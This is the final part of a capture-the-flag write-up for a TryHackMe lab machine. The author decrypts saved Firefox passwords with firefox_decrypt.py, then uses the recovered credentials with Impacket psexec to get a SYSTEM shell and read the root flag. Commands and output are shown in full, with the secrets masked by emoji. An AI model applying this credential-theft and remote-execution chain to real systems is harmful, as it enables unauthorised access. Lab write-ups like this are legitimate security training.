python3 firefox_decrypt.py /home/u915/Escritorio/tryhackme/gatekeeper/firefox/    12 ⨯
2021-07-05 00:00:56,778 - WARNING - profile.ini not found in /home/u915/Escritorio/tryhackme/gatekeeper/firefox/
2021-07-05 00:00:56,779 - WARNING - Continuing and assuming '/home/u915/Escritorio/tryhackme/gatekeeper/firefox/' is a profile location

Website:   https://creds.com
Username: 'mayor'
Password: '8CL7😄'

Using the credentials with Impacket's psexec:

/usr/bin/impacket-psexec "mayor:8CL7:smile:"@10.10😄    130 ⨯
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10😄.....
[*] Found writable share ADMIN$
[*] Uploading file WFJAEcWP.exe
[*] Opening SVCManager on 10.10😄.....
[*] Creating service yHQT on 10.10😄.....
[*] Starting service yHQT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Finally rooted. Flag looted:


C:\Users\mayor\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 3ABE-D44B

 Directory of C:\Users\mayor\Desktop

05/14/2020  09:58 PM    <DIR>          .
05/14/2020  09:58 PM    <DIR>          ..
05/14/2020  09:21 PM                27 root.txt.txt
               1 File(s)             27 bytes
               2 Dir(s)  15,031,672,832 bytes free

C:\Users\mayor\Desktop>type root.txt.txt
{Th3_😄}

Good machine. The hardest part was thinking about the Firefox folder, because in the first minutes I did not pay attention to it; I expected winPEAS to flag vulnerable settings.


Thanks for reading!